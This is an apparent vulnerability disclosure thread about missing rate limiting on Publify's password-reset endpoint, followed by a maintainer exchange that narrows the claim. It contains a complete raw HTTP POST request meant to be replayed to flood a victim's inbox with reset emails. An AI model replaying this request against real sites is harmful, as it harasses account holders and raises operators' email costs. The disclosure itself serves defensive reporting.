Insufficient Granularity of Access Control in publify/publify
Reported on
Oct 12th 2021
Description
There is not Rate limit protection bypass sent unlimited email victim who have account email address.
Proof of Concept
There is no rate limit users/password, attacker to send unlimited email who have account victim email address.
POST /users/password HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=bcc4763a5e705ab2f900361126dc1a92
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo-publify.herokuapp.com/users/password/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Origin: https://demo-publify.herokuapp.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
utf8=%E2%9C%93&authenticity_token=aMSmWPPXrTwPfgTcEeKEqEKfpcHJiggrpOvwt5b9MyFHfGws3tJQDfbCb9u4nQY98rXHzFnUGwUSVtbxVfLD3A%3D%3D&user%5Bemail%5D=admin%40gmail.com&commit=Send+me+reset+password+instructions
Post data email= parameter value to victim mail. this request unlimited time and victim email address will received unlimited verification email .
Impact
Attacker can sent unlimited email to (who have account) any victim mail address . Many email service provider has limited email sending like 1000 email per month . If you exceed that limit then you will be extra charged . So, using this attack attacker can exceed that limit and company will be charged extra money.
AFAIK , the attacker can only send unlimited email to people who actually have an account.
I have confirmed that a mail is not sent if the email address does not correspond to an existing account.
In any case, I think this is something that would have to be changed in Devise (https://github.com/heartcombo/devise).
reference report https://www.huntr.dev/bounties/2d3b85ec-1ff9-4226-859a-776de238b246/
https://github.com/BookStackApp/BookStack/commit/ca764caf2d55a5c9bac61718d656423b0c3a060b
How is this relevant? I cannot read that report and Publify is not written in PHP.
https://www.huntr.dev/bounties/d33cd2a3-1cff-4a9d-a0d1-df7d01e2d1e2/
Again, Publify does not use Laraval. If you don't engage with what I'm commenting here I'm going to close this as invalid.
Attacker can sent unlimited email to any victim mail address .
This is incorrect. Please adjust the report to reflect the actual situation.
(Attacker can send unlimited email to people who actually have an account). The attacker abuse the functionality forget password, if the attacker get victim mail id the request unlimited forget password request who have account victim mail id , that can be leads to send unlimited forget password mail there is not rate limit send forget password page. I am not saying Laraval, that is same report for reference, No rate limit is everywhere, so please set throttle to send forget password.
@raptor thank you for adjusting the report.
Yes, it was already clear to me that there are similar reports.